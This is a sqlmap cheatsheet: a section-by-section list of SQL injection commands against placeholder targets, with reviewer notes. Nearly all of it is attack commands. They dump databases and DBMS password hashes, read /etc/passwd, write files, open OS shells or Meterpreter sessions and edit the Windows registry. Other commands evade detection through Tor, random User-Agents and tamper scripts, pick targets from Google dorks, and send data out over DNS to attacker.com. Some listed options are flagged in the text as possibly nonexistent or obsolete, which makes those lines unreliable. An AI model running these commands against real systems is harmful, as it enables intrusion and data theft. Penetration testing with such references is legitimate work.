SQLMap Cheatsheet
The Ultimate SQL Injection Tool Reference Guide
Basic SQLMap Usage
# Basic runs against one URL. Every command sends live test requests to the
# target; example.com, database_name and table_name are placeholders.

# Test the parameters in the query string (here: id) with default settings.
sqlmap -u "http://example.com/page.php?id=1"
# NOTE(review): --check-waf is reported as obsolete by later sqlmap releases,
# which run WAF/IPS detection automatically. Confirm against `sqlmap -hh`.
sqlmap -u "http://example.com" --check-waf
# --dbs: enumerate database names.
sqlmap -u "http://example.com/page.php?id=1" --dbs
# -D NAME --tables: enumerate the tables of one database.
sqlmap -u "http://example.com/page.php?id=1" -D database_name --tables
# -T NAME --dump: retrieve the rows of one table. The dumped data is also
# written under sqlmap's local output directory.
sqlmap -u "http://example.com/page.php?id=1" -D database_name -T table_name --dump
# --batch: never prompt; take the default answer to every question.
sqlmap -u "http://example.com/page.php?id=1" --batch
# -v 3: verbosity level 3, which also prints each injected payload.
sqlmap -u "http://example.com/page.php?id=1" -v 3
# --save: store the command-line options in a configuration INI file.
# NOTE(review): newer releases take a file name (--save=FILE). This saves
# options, not session data. Confirm against the installed version.
sqlmap -u "http://example.com/page.php?id=1" --save
# NOTE(review): sqlmap's option list has no --resume as far as I can tell.
# Session data is kept per target in the output directory and reused
# automatically; -s FILE loads a stored session (.sqlite) file. Verify this
# line against `sqlmap -hh` before relying on it.
sqlmap --resume session_file
Target Specification
# Ways of telling sqlmap what to test.

# -d: connect directly to the DBMS with a connection string; no web
# application is involved. The password is part of the argument, so it is
# visible in shell history and the process list.
sqlmap -d "mysql://user:pass@host:port/dbname"
# -m: read multiple target URLs from a text file.
sqlmap -m targets.txt
# -g: use the results of a Google dork as target URLs. The targets are then
# whatever the search engine returns, not a fixed scope list.
sqlmap -g "inurl:index.php?id="
# -l: parse targets from a Burp or WebScarab proxy log file.
sqlmap -l logfile.log
# -r: load a complete HTTP request from a file, so headers, cookies and body
# are sent as captured.
sqlmap -r request.txt
# --crawl=2: crawl the site from the target URL to depth 2 and test the links
# that are found.
sqlmap -u "http://example.com" --crawl=2
# NOTE(review): sqlmap documented sitemap parsing as -x SITEMAPURL. I cannot
# confirm a --sitemap long form; verify against `sqlmap -hh`.
sqlmap -u "http://example.com" --sitemap=url
Request Configuration
# How the HTTP requests are built and sent.

# --method: force the HTTP method.
sqlmap -u "http://example.com" --method=POST
# --data: request body to send; its parameters are tested.
sqlmap -u "http://example.com" --data="id=1"
# -p: test only the listed parameters.
sqlmap -u "http://example.com/page.php?id=1&cat=2" -p "id,cat"
# --skip: leave the listed parameters untested.
sqlmap -u "http://example.com/page.php?id=1&cat=2" --skip="cat"
# --cookie: Cookie header value. Cookie values are tested for injection only
# from --level 2 upward, hence the pairing.
sqlmap -u "http://example.com" --cookie="id=1" --level=2
# --user-agent / --referer: set the header value. Both headers are tested for
# injection only from --level 3 upward.
sqlmap -u "http://example.com" --user-agent="sqlmap" --level=3
sqlmap -u "http://example.com" --referer="http://google.com" --level=3
# NOTE(review): --headers takes the header text itself ("Name: value",
# separated by \n), not a file path. As written this would send the literal
# string headers.txt. Confirm against `sqlmap -hh`.
sqlmap -u "http://example.com" --headers="headers.txt"
# --auth-type / --auth-cred: HTTP authentication. The credentials are part of
# the command line, so they end up in shell history and the process list.
sqlmap -u "http://example.com" --auth-type=BASIC --auth-cred="user:pass"
# --proxy: send all traffic through an HTTP proxy (here a local one on 8080).
sqlmap -u "http://example.com" --proxy="http://127.0.0.1:8080"
# --tor / --tor-type / --check-tor: route traffic through Tor over SOCKS5 and
# check that Tor is actually in use before testing.
sqlmap -u "http://example.com" --tor --tor-type=SOCKS5 --check-tor
# --delay: seconds to wait between requests.
sqlmap -u "http://example.com" --delay=1
# --timeout: seconds before a connection times out (30 is the documented default).
sqlmap -u "http://example.com" --timeout=30
# --retries: retries after a timeout (3 is the documented default).
sqlmap -u "http://example.com" --retries=3
# --random-agent: pick the User-Agent from sqlmap's bundled list. The default
# User-Agent names the tool, so a filter or detection rule keyed on that
# header only sees runs that left it unchanged.
sqlmap -u "http://example.com" --random-agent
# --host: Host header value to send.
sqlmap -u "http://example.com" --host="custom.example.com"
Database Enumeration
# Enumeration switches; they take effect once an injection point has been
# confirmed. The URLs in this section carry no parameter, so they are
# placeholders: a real run needs a testable parameter (query string, --data,
# -r request file, ...).
# What each switch can return depends on what the application's database
# account is allowed to read; an account without access to the system
# catalogs and user tables yields little for --users, --passwords and
# --privileges.

# --current-user: DBMS user the application connects as.
sqlmap -u "http://example.com" --current-user
# --current-db: database currently in use.
sqlmap -u "http://example.com" --current-db
# --hostname: host name of the DBMS server.
sqlmap -u "http://example.com" --hostname
# --is-dba: whether the current user has DBA rights.
sqlmap -u "http://example.com" --is-dba
# --users: DBMS user accounts.
sqlmap -u "http://example.com" --users
# --privileges: privileges of the DBMS users.
sqlmap -u "http://example.com" --privileges
# --passwords: password hashes of the DBMS users.
sqlmap -u "http://example.com" --passwords
# --roles: roles of the DBMS users.
sqlmap -u "http://example.com" --roles
# --dbs: database names.
sqlmap -u "http://example.com" --dbs
# -D/--tables: tables of one database.
sqlmap -u "http://example.com" -D database_name --tables
# -T/--columns: columns of one table.
sqlmap -u "http://example.com" -D database_name -T table_name --columns
# --dump: rows of one table.
sqlmap -u "http://example.com" -D database_name -T table_name --dump
# -C: restrict the dump to the listed columns.
sqlmap -u "http://example.com" -D database_name -T table_name -C column1,column2 --dump
# --count: number of rows, without retrieving them.
sqlmap -u "http://example.com" -D database_name -T table_name --count
# --schema: full schema (databases, tables, columns and their types).
sqlmap -u "http://example.com" --schema
# --search -T: look for tables whose name matches "user".
sqlmap -u "http://example.com" --search -T user
# --comments: also look for DBMS comments during enumeration.
sqlmap -u "http://example.com" --comments
# --banner: DBMS version banner.
sqlmap -u "http://example.com" --banner
Injection Techniques
# Choosing the injection techniques and shaping the payload.
# --technique letters: B = boolean-based blind, E = error-based,
# U = UNION query-based, S = stacked queries, T = time-based blind,
# Q = inline queries. BEUSTQ (all of them) is the default.
sqlmap -u "http://example.com" --technique=BEUSTQ
sqlmap -u "http://example.com" --technique=B
sqlmap -u "http://example.com" --technique=E
sqlmap -u "http://example.com" --technique=U
sqlmap -u "http://example.com" --technique=S
sqlmap -u "http://example.com" --technique=T
sqlmap -u "http://example.com" --technique=Q
# --second-order: URL of the page where the result of the injection shows up.
# NOTE(review): later sqlmap releases name this option --second-url; confirm
# against `sqlmap -hh` for the installed version.
sqlmap -u "http://example.com" --second-order="http://example.com/response.php"
# -p / --skip: restrict testing to, or exclude, named parameters.
sqlmap -u "http://example.com/page.php?id=1&cat=2" -p "id"
sqlmap -u "http://example.com/page.php?id=1&cat=2" --skip="cat"
# The * after id=1 marks a custom injection point; --prefix and --suffix are
# the strings placed before and after every payload.
sqlmap -u "http://example.com/page.php?id=1*" --prefix="'" --suffix="AND '1'='1"
# --tamper: scripts that rewrite each payload before it is sent.
sqlmap -u "http://example.com" --tamper="between.py,randomcase.py"
# --level (1-5) widens the set of tests and tested inputs; --risk (1-3) allows
# riskier payloads. Risk 3 adds OR-based tests, which can change every row if
# the injection point sits in an UPDATE or DELETE statement.
sqlmap -u "http://example.com" --level=3 --risk=3
Optimization Options
# Speed-related switches.

# --predict-output: predict the output of common queries.
sqlmap -u "http://example.com" --predict-output
# --keep-alive: use persistent HTTP(S) connections.
sqlmap -u "http://example.com" --keep-alive
# --null-connection: obtain the response length without fetching the body.
sqlmap -u "http://example.com" --null-connection
# --threads: maximum number of concurrent requests (default 1).
sqlmap -u "http://example.com" --threads=5
# -o: turn on all optimization switches at once.
sqlmap -u "http://example.com" -o
# NOTE(review): --force-dns does not appear in sqlmap's documented option
# list that I can confirm, and it reads as a DNS-exfiltration setting rather
# than an optimization. Verify against `sqlmap -hh`.
sqlmap -u "http://example.com" --force-dns
# --fresh-queries: ignore query results already stored in the session file.
# sqlmap lists it under its general options, not under optimization.
sqlmap -u "http://example.com" --fresh-queries
Injection Options
# Detection and technique tuning (sqlmap's own help groups most of these
# under "Detection" and "Techniques").

# --fingerprint: extensive DBMS version fingerprint.
sqlmap -u "http://example.com" --fingerprint
# --string / --not-string / --regexp / --code / --text-only / --titles tell
# sqlmap how to distinguish a True response from a False one when the
# automatic page comparison is unreliable.
# --string: text present when the condition is True.
sqlmap -u "http://example.com" --string="Welcome back"
# --not-string: text present when the condition is False.
sqlmap -u "http://example.com" --not-string="Error"
# --regexp: regular expression matching a True response.
sqlmap -u "http://example.com" --regexp="Welcome \w+"
# --code: HTTP status code of a True response.
sqlmap -u "http://example.com" --code=200
# --text-only: compare pages on their text content only.
sqlmap -u "http://example.com" --text-only
# --titles: compare pages on their HTML title only.
sqlmap -u "http://example.com" --titles
# --union-cols: range of column counts to try for UNION queries.
sqlmap -u "http://example.com" --union-cols=17-23
# --union-char: character used while bruteforcing the column count.
sqlmap -u "http://example.com" --union-char=123
# --union-from: table to use in the FROM part of UNION queries.
sqlmap -u "http://example.com" --union-from=users
# --dns-domain: domain used for DNS exfiltration; attacker.com stands for a
# domain whose authoritative name server the tester runs. The channel needs
# the database host to resolve external names, so it does not work where
# database servers have no outbound DNS resolution.
sqlmap -u "http://example.com" --dns-domain=attacker.com
Brute Force Options
# Wordlist-based existence checks, used when the system catalogs cannot be
# read.

# --common-tables: check whether commonly used table names exist.
sqlmap -u "http://example.com" --common-tables
# --common-columns: check whether commonly used column names exist.
sqlmap -u "http://example.com" --common-columns
# --common-files: check whether commonly used file paths exist.
sqlmap -u "http://example.com" --common-files
# --charset: character set tried during blind extraction (here: lowercase hex
# digits). NOTE(review): sqlmap lists this under its general options, not
# under brute force; confirm against `sqlmap -hh`.
sqlmap -u "http://example.com" --charset="0123456789abcdef"
File System Access
# Reading and writing files on the DBMS host through the injection.
# Presumably this only works where the DBMS and the application's database
# account permit file access (for MySQL: the FILE privilege, further limited
# by secure_file_priv). Confirm per DBMS.

# --file-read: fetch a file from the DBMS server's file system.
sqlmap -u "http://example.com" --file-read="/etc/passwd"
# --file-write / --file-dest: copy a local file to an absolute path on the
# DBMS server.
sqlmap -u "http://example.com" --file-write="local.txt" --file-dest="/remote/path/remote.txt"
# NOTE(review): --list-directories is not an option I can find in sqlmap's
# usage; verify against `sqlmap -hh` before keeping this line.
sqlmap -u "http://example.com" --list-directories="C:/"
Operating System Access
# Operating-system access through the DBMS.
# Presumably these depend on the DBMS type and on the database account being
# allowed to write files or execute commands. TODO confirm per DBMS.

# --os-shell: prompt for an interactive OS shell.
sqlmap -u "http://example.com" --os-shell
# --os-pwn: prompt for an out-of-band shell, Meterpreter or VNC session.
sqlmap -u "http://example.com" --os-pwn
# --os-cmd: run a single OS command (here: id).
sqlmap -u "http://example.com" --os-cmd="id"
# --os-bof: stored-procedure buffer overflow exploitation.
sqlmap -u "http://example.com" --os-bof
# --priv-esc: privilege escalation of the database process user.
sqlmap -u "http://example.com" --priv-esc
# --msf-path: local path of the Metasploit Framework installation. It is a
# setting for the switches that use Metasploit, not an action by itself.
sqlmap -u "http://example.com" --msf-path=/opt/metasploit
Windows-Specific Options
# Windows registry access on the DBMS host.
# --reg-read, --reg-add and --reg-del are the actions. --reg-key, --reg-value,
# --reg-data and --reg-type are their parameters and are meant to be combined
# with one action on the same command line; each line below shows one option
# in isolation.

# --reg-read: read a registry key value.
sqlmap -u "http://example.com" --reg-read
# --reg-add: write a registry key value.
sqlmap -u "http://example.com" --reg-add
# --reg-del: delete a registry key value.
sqlmap -u "http://example.com" --reg-del
# --reg-key: the registry key to operate on.
sqlmap -u "http://example.com" --reg-key="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft"
# --reg-value: the value name under that key.
sqlmap -u "http://example.com" --reg-value="InstallPath"
# --reg-data: the data to store in the value.
sqlmap -u "http://example.com" --reg-data="C:\Program Files"
# --reg-type: the registry value type.
sqlmap -u "http://example.com" --reg-type="REG_SZ"
Miscellaneous Options
# General and miscellaneous switches.

# --parse-errors: parse and display DBMS error messages found in responses.
sqlmap -u "http://example.com" --parse-errors
# --cleanup: remove the sqlmap-specific UDFs and tables left in the DBMS.
sqlmap -u "http://example.com" --cleanup
# --flush-session: discard the stored session data for this target.
sqlmap -u "http://example.com" --flush-session
# --check-internet: check the Internet connection before assessing the target.
sqlmap -u "http://example.com" --check-internet
# --alert: host OS command run locally when an injection is found; ALERT is a
# placeholder for that command.
sqlmap -u "http://example.com" --alert="ALERT"
# --answers: preset answers to sqlmap's questions (here: follow redirects = Y).
sqlmap -u "http://example.com" --answers="follow=Y"
# --beep: beep on a question and/or when an injection is found.
sqlmap -u "http://example.com" --beep
# --dependencies: check for missing optional sqlmap dependencies.
sqlmap -u "http://example.com" --dependencies
# --disable-coloring: plain console output.
sqlmap -u "http://example.com" --disable-coloring
# --gpage: with -g, use the Google dork results from the given page number.
sqlmap -u "http://example.com" --gpage=2
# NOTE(review): --page-compare is not an option I can find in sqlmap's usage;
# verify against `sqlmap -hh` before keeping this line.
sqlmap -u "http://example.com" --page-compare
# --skip-waf: skip the heuristic WAF/IPS detection.
sqlmap -u "http://example.com" --skip-waf
# --smart: run the thorough tests only when the heuristics are positive.
sqlmap -u "http://example.com" --smart
# --sqlmap-shell: interactive sqlmap shell.
sqlmap --sqlmap-shell
# --wizard: guided question-and-answer interface.
sqlmap --wizard